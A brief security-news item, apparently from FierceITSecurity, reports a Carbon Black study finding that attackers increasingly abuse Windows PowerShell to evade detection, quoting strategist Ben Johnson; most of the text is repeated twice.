There has been a substantial increase of attackers exploiting
Microsoft's PowerShell, a Windows task automation and configuration
management framework, during cyberattacks, according to a study [.pdf] released Tuesday by security firm Carbon Black.
This is part of growing industry trend of malware authors attempting to evade detection using native tools on operating systems.
"The bad guys are evolving and they are trying to use more tools and techniques that are built into the operating system, whether it is Windows, Mac, Linux, or whatever….Once people get into your environment and can use your built-in tools, it just makes them more stealthy and effective. It's just a harder attack to defend against," said Ben Johnson, co-founder/chief security strategist at Carbon Black
PowerShell is an ubiquitous technology in Windows, and it serves as an ideal way for attackers to remain undetected. Its ability to dynamically load and execute code without touching the file system makes it especially difficult to secure, according to Carbon Black.
"PowerShell is too powerful. It can do all sorts of things on the system. And it does it through running scripts. So the attackers can run scripts, and it makes them very efficient as developers," Johnson told FierceITSecurity.
For the PowerShell exploitation study, Carbon Black pulled data from more than 1,100 investigations, stemming from 24 partners in the cybersecurity community. The company released the report at the start of the Threat Hunting and IR Summit being held in New Orleans and sponsored by Carbon Black and the SANS Institute
fierceitsecurity
This is part of growing industry trend of malware authors attempting to evade detection using native tools on operating systems.
"The bad guys are evolving and they are trying to use more tools and techniques that are built into the operating system, whether it is Windows, Mac, Linux, or whatever….Once people get into your environment and can use your built-in tools, it just makes them more stealthy and effective. It's just a harder attack to defend against," said Ben Johnson, co-founder/chief security strategist at Carbon Black
PowerShell is an ubiquitous technology in Windows, and it serves as an ideal way for attackers to remain undetected. Its ability to dynamically load and execute code without touching the file system makes it especially difficult to secure, according to Carbon Black.
"PowerShell is too powerful. It can do all sorts of things on the system. And it does it through running scripts. So the attackers can run scripts, and it makes them very efficient as developers," Johnson told FierceITSecurity.
For the PowerShell exploitation study, Carbon Black pulled data from more than 1,100 investigations, stemming from 24 partners in the cybersecurity community. The company released the report at the start of the Threat Hunting and IR Summit being held in New Orleans and sponsored by Carbon Black and the SANS Institute
fierceitsecurity